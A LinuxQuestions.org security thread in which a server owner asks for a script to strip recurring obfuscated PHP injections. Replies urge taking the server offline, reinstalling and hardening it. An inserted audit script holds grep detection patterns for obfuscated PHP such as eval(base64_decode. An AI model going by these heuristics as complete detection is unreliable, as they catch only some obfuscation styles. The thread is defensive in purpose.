LinuxQuestions.org
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
Old 11-06-2015, 07:38 AM   #1
pvdoffice
I need help to replace a stupid virus code in all files on server with blank


Hello everyone,

I am contacting you because I have had a problem for 2 years.

From time to time I get an injection on the server that infects almost all of the files on my Linux server. I don't know how to stop it; I tried many times with the latest versions of antivirus, malware scanners, etc. I got tired of it and wasted too much time.

So I decided to make a script and run it as a daily cron job to search all files and folders in Linux and replace the code with blank. This way it can get infected 3 times a day and it will be auto-cleaned.


I don't have the code now, but it's quite a big encrypted code, I guess 2000 characters, and it has all types of characters like $, /, etc.


example "/$p2rerkfjkaj35"FASFAsfa//fsafaf/fsa"

So I need to replace "/$p2rerkfjkaj35"FASFAsfa//fsafaf/fsa" with "" (just blank), and consider that the code is quite big and has characters like "/" in it.


Thank you, it will help me a lot.

Many thanks.
 
Old 11-06-2015, 08:18 AM   #2
uburundi
This virus that infects human brains and makes us more stupid is very dangerous, so you need to have a strong antivirus on your computer which is able to detect those viruses, more scanning of your computer, and sunglasses to protect your eyes.
Thank you.
Nduwimana Gabriel.
 
Old 11-06-2015, 08:35 AM   #3
onebuck
Moderator response

Moved: This thread is more suitable in <Linux - Security> and has been moved accordingly to help your thread/question get the exposure it deserves.
 
Old 11-06-2015, 08:53 AM   #4
Emerson
You do not "fix" Linux computers with antivirus. Your Linux box either is clean or is infected. Windows-like thinking ("oh, I got most of it out") does not work and is not acceptable in Linux.

Take the infected machine offline ASAP; only a complete re-install will put you back in business. Make sure you harden your server before putting it back online.
 
Old 11-06-2015, 10:22 AM   #5
Habitual
The whole mess smacks of incorrect file and directory permissions.
Instead of your "example" how about some actual content of the infection? Say just 100 characters or so.
Do you see any "eval(base64_decode" stuff (or similar) in your php files?
Where in the file are these infections?

Are you certain credentials aren't exploited? (ftp passwords are usually suspect).

Files should be 644 and directories should be 755.
The few exceptions would be cgi-bin stuff.

Clamscan can detect and identify infected web-content/files.
rkhunter can check for rootkits.

Merely running a cron job to replace infections is locking the barn door after the horses have escaped.
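As an added example (not from the thread or any poster), this POSIX shell script applies the checklist above to a web root: it lists files that are not 644 and directories that are not 755, skipping cgi-bin as the post allows, and lists PHP files carrying the obfuscation markers mentioned (eval(base64_decode and similar). The script name, the /var/www path and the exact heuristics are assumptions; it only reads, never modifies.

```shell
#!/bin/sh
# Added example, not from the thread: read-only audit of a web root.
# It reports (a) files/directories with modes other than 644/755, pruning any
# cgi-bin directory, and (b) *.php files matching obfuscation heuristics such as
# eval(base64_decode(...)), preg_replace with the /e modifier, or runs of
# \xNN / \NNN string escapes of the kind used in the injection quoted later in
# the thread. Treat every hit as "inspect this file", not as proof on its own.

# find_bad_perms WEBROOT
# Prints every file whose mode is not exactly 644 and every directory whose
# mode is not exactly 755, one path per line. Directories named cgi-bin are
# pruned because their scripts legitimately need the execute bit.
find_bad_perms() {
    find "$1" -type d -name cgi-bin -prune -o \
        -type f ! -perm 644 -print -o \
        -type d ! -perm 755 -print
}

# find_obfuscated_php WEBROOT
# Prints each *.php file matching at least one heuristic:
#   - eval() wrapped directly around a decoder function
#   - preg_replace() whose pattern ends with the /e (evaluate) modifier
#   - four or more consecutive \xNN or \NNN escapes inside a string, the style
#     used to hide names like HTTP_USER_AGENT in the injection quoted below
# grep exits non-zero when nothing matches, which is not an error here.
find_obfuscated_php() {
    find "$1" -type f -name '*.php' -exec grep -lE \
        -e 'eval\((base64_decode|gzinflate|gzuncompress|str_rot13)\(' \
        -e "preg_replace\\(.*/e['\"]" \
        -e '(\\(x[0-9a-fA-F]{2}|[0-7]{3})){4}' \
        {} + 2>/dev/null || true
}

# audit_webroot WEBROOT: run both checks with labelled sections.
audit_webroot() {
    echo "== permission problems (expected: files 644, directories 755) =="
    find_bad_perms "$1"
    echo "== PHP files with obfuscation indicators =="
    find_obfuscated_php "$1"
}

# Usage: sh audit_webroot.sh /var/www   (script name and path are assumed)
if [ -n "$1" ]; then
    audit_webroot "$1"
fi
```

Run it from a daily cron job if you like, but as the post says, its output is a list of things to investigate, not a cleanup.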
 
Old 11-08-2015, 02:58 PM   #6
pvdoffice
Original Poster
Hi again, and thanks for the answers.

I tried many times to put the server offline and update all passwords, checking file by file, and it's moving across all domains / subdomains.

So my question is if someone can help me with a command to replace the code (I will copy + paste the full code here):

Quote:
[obfuscated PHP injection code omitted]
with blank. Thank you, a script to do it recursively on all folders. Many thanks.

Last edited by unSpawn; 11-09-2015 at 12:47 AM. Reason: //swap quote tags for code tags for better readability doesn't work.
 
Old 11-08-2015, 03:22 PM   #7
astrogeek
Writing blanks to those files will NOT end the problem.

It is not a virus, you cannot take a pill and feel better tomorrow!

Your server has been compromised.

There will be multiple other entry points that will not be found by such a script, which will allow the intruder to simply rewrite all the php files... again... as you have already seen.

READ THIS AND UNDERSTAND IT:
Quote:
1. Take that system offline immediately - no excuses - do not return it to service! Every minute that it remains online it continues to deliver SPAM and malware to others!
2. YOU* CANNOT clean up that server with a script or anti-virus program! Forget about it!
The ONLY way to stop this is to reinstall from the ground up from known clean sources.
If you do not have known clean sources then shut it down and start over, keeping frequent known clean backups this time!

*(Someone with knowledge, time and access might clean it up, but it would not involve copy/paste scripts or antivirus and would always take much longer and be less reliable than a clean reinstall)
Quote:
I am contacting you because I have had a problem for 2 years.
If this has indeed been ongoing for two years, that is, your server has been delivering giga-bytes of SPAM to the internet for two years, you should consider switching to some other line of business!

Last edited by astrogeek; 11-08-2015 at 03:30 PM.
 
Old 11-09-2015, 01:07 AM   #8
unSpawn
Quote:
Originally Posted by pvdoffice View Post
I tried many times with the latest versions of antivirus, malware scanners, etc. I got tired of it and wasted too much time (..) So I need to replace
No, replacing text isn't going to solve your problem, as it will only give you a false sense of control.


Quote:
Originally Posted by pvdoffice View Post
From time to time I get an injection on the server that infects almost all of the files on my Linux server. I don't know how to stop it,
The fact that you have had these problems for the past two years is telling. If you can't control a situation there are always other resources to get help from, ranging from asking at a local LUG to hiring a capable sysadmin to correct things for you, and in the right way. And two years also says you most likely haven't made any drastic decisions either to combat this problem. OK. Enough about that.

Indeed you need to reinstall a current version of the OS you use, and you really need to properly harden it before you expose it, but you particularly need to pay attention to what runs in your web stack, because re-installing the OS and then simply restoring any CMS, board or photo gallery software without careful scrutiny will result in failure.

If unsure, start by reading up on things and post a more detailed account of 0) your situation, like whether it's a shared hosting account or a private server, and whether you have a single user or a multi-tenant setup, 1) what software (names and versions) you run, same for plugins, themes, addons, extensions and other such modifications, and 2) a detailed account of the measures you took to combat this problem.